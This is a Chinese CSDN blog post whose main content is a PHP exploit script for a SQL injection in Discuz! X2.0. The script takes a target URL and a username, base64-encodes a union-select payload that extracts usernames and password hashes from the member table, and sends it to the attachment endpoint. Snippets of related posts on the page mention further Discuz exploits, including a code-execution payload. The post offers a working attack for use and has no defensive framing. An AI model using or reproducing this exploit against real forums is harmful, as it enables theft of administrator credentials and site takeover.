Discuz! X2.0 0day EXP

最新推荐文章于 2022-02-25 19:38:17 发布
最新推荐文章于 2022-02-25 19:38:17 发布
阅读量633 收藏
点赞数
分类专栏: 漏洞收集 文章标签: file url c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6585518
版权

<?php

echo "Discuz! X2.0  0day EXP\n";
echo "By:Steeltiger \n";
echo "php.exe dz2exp.php http://www.xxx.com/ admin\n";
if(!empty($argv[1]) &&!empty($argv[2]))
{
echo "Start\n";
$exp = base64_encode("1' and 1=2 union all select 1,group_concat(username,0x7C3274747C,password) from pre_common_member where  username like '".$argv[2]."|x|y");
$url = "forum.php?mod=attachment&findpost=ss&aid=";
file_get_contents($argv[1].$url.$exp);
echo "End\n";
}
?>
7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dzexp利用工具 dz7.1 dz7.2 0day漏洞利用
01-28
dzexp利用工具 dz7.1 dz7.2 0day漏洞利用
dz 2级域名
edisonkun的专栏
08-16 786
例如(http://www.cheungfei.com)开启了二级域名(http://bbs.cheungfei.com)开启之后发现不能同步登陆。刚开始以为要在Ucenter中添加应用,后来发现问题还没有解决。到DISCUZ官网看看别人的帖子,才想到是cookie的问题。因为cookie决定了同步登陆的问题。具体的解决办法如下:修改config/config_global.php里面的cooki
DiscuzX3.2_SSRF_EXP环境测试
四盘山博客
03-28 2881
DiscuzX3.2_SSRF_EXP 1.环境 Ubuntu 14.04.3+docker +pocsuite https://github.com/C1tas/DiscuzX3.2_SSRF_EXP 2. Requirements Python 2.6+ Works on Linux, Windows, Mac OSX, BSD Installation The quick way
discuz X2 0day
收集盒 Book box
03-19 1098
http://hi.baidu.com/bigideaer/blog/item/c2868c26c8ca1e4e4ec22615.html 核心提示:文件:source\module\forum\forum_attachment.php 漏洞名称:Discuz! X2 SQL注射漏洞 if(!defined(‘IN_DISCUZ’)) {exit(‘Access De
Discuz! X2.5 远程代码执行漏洞及EXP[XDAY]
oceanark的博客
07-13 2610
----------- 首先膜拜大牛的共享精神,我淫比较懒试了几个站都没成功就不弄了,但有人说成功了,不知道是PR问题还是补丁了   正文:前面省略一万+字。。。。 利用方法 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),
Xweibo For Discuz! X2.0 v2.1.6
04-21
1.支持国内最大的开源软件Discuz!全系列产品。 2.即将支持国内主流的社区、CMS、商城等开源程序。安装即用易于维护 1.简单的安装步骤能快速的应用于网站。 2.成熟的技术保障稳定的服务。 3.功能将持续升级并强化...
Xweibo For Discuz! X2.0 2.1.5
04-30
X2.0版本刚发布不久,新浪Xweibo针对Discuz!X2.0开始了内测。经过技术人员的奋力研发,Xweibo for Discuz! X2.0 2.0Beta版本也于今日发布测试包。Xweibo真诚邀请站长参加内测版本的测试。Xweibo for Discuz!X2.0 2.0...
Discuz! X2.0 仿19楼完整模板源代码
03-18
信息说明 风格名称: X2.0-原创绿色新版19楼风格(支持宽屏) 适用版本: Discuz! X2.0 正式版 风格编码: GBK 简体中文版 风格简介: 1. 安装后可以快速的把您的论坛变成一个Home页+论坛风格的整合门户; 2. 使用DZX特有的...
discuz!X2.0 在线客服插件.rar
07-14
在线客服插件,后台插件管理可以一键更换风格,更多详细信息看下面内容。
Discuz! x2.0清新风格模板
11-24
黑色XK炫酷模板Discuz模板是一款用于社区 黑色 论坛 交流的模板,适用于discuz0 x2版本。
Discuz X3.2实现手机号登录
飞奔的猫的专栏
07-08 4472
1.实现手机号登录,很简单 在pre_common_member,pre_ucenter_members两张表增加mobile字段 发现登录调用的是UC的uc_user_login接口方法,此方法在uc_client/client.php文件里, 然后跟踪,在控制器文件夹uc_client/control/user.php里找到onlogin()方法, 继续跟踪在model文件uc_cli
DiscuzX2注入漏洞及XSS漏洞的利用
harryxlb的专栏
11-17 4916
注射漏洞详细说明: 文件:source\module\forum\forum_attachment.php if(!defined('IN_DISCUZ')) { exit('Access Denied'); } define('NOROBOT', TRUE); @list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'],
Discuz! X2 SQL注射漏洞 0day
fengling132的专栏
05-02 1008
@Discuz! X2 SQL注射漏洞 0day  文件:source\module\forum\forum_attachment.php   if(!defined('IN_DISCUZ')) { exit('Access Denied'); } define('NOROBOT', TRUE); @list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t
Discuz X3.2UC漏洞直接拿shell论坛创始人无视验证码爆破
热门推荐
weixin_40966980的博客
01-03 2万+
这里有个验证码的地址,为:http://localhost/uc_server/admin.php?m=seccode&seccodeauth=07d4kVIZ%2Fj5pecd%2Bv7%2FuE0zfvj%2FKRIrF3pmAd%2BupYhm4GT4&1104676922 验证码一直是 cccc 应该是每个ip第一次访问的话都是这个,所以可以用来爆破
(转)Discuz! X2.0 SQL注入漏洞 EXP
weixin_34092370的博客
06-29 313
DZ2.0直接暴管理账号密码(默认前缀的情况下) /forum.php?mod=p_w_upload&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd 29yZCkgZnJv...
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 8717
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3121
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 3585
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
系统学习 TypeScript(四)——变量声明的初步学习
编程三昧
02-25 1481
认识了 TypeScript 中的基础类型,接下来当然是变量声明的相关学习了,我在这里记录一下我学习过程中的一些总结。
discuz! x3.4 文库网站模板
最新发布
09-03
X3.4 文库网站模板是一个基于discuz! X3.4论坛系统开发的专门用于搭建文库类网站的模板。它提供了丰富的功能和设计,使用户可以方便地创建和管理属于自己的文库网站。 首先,discuz! X3.4 文库网站模板具有强大的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值